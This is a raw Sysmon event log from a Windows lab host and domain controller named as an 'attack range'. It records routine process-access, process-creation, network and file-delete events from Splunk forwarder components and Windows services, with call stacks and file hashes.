14:15:51.432{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043871Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043870Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043869Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043868Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043867Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043866Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043865Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043864Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-1797-629A-0B07-000000006002}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043863Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1797-629A-0B07-000000006002}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043862Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.435{0A5DF930-1797-629A-0B07-000000006002}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000043861Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.432{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=288A072739CC60DAB7578F658CBD0326,SHA256=D9761475A65C14BA8FCDC855AE0A678C69834ACCCF8BF5B46FAA34D6370A80DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043860Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:51.136{0A5DF930-1796-629A-0A07-000000006002}6322792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043890Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1798-629A-0C07-000000006002}824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043889Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043888Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043887Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043886Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043885Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043884Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043883Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043882Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043881Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043880Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-1798-629A-0C07-000000006002}824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043879Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.573{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1798-629A-0C07-000000006002}824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043878Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.576{0A5DF930-1798-629A-0C07-000000006002}824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000043877Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:49.684{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52317-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043876Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:52.214{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C6FA86428F70AB2839F8E9995D63109,SHA256=C85DCBF2F5DC2485B76258C8D94029149EC975A0E0706E64842297CD092E3E49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 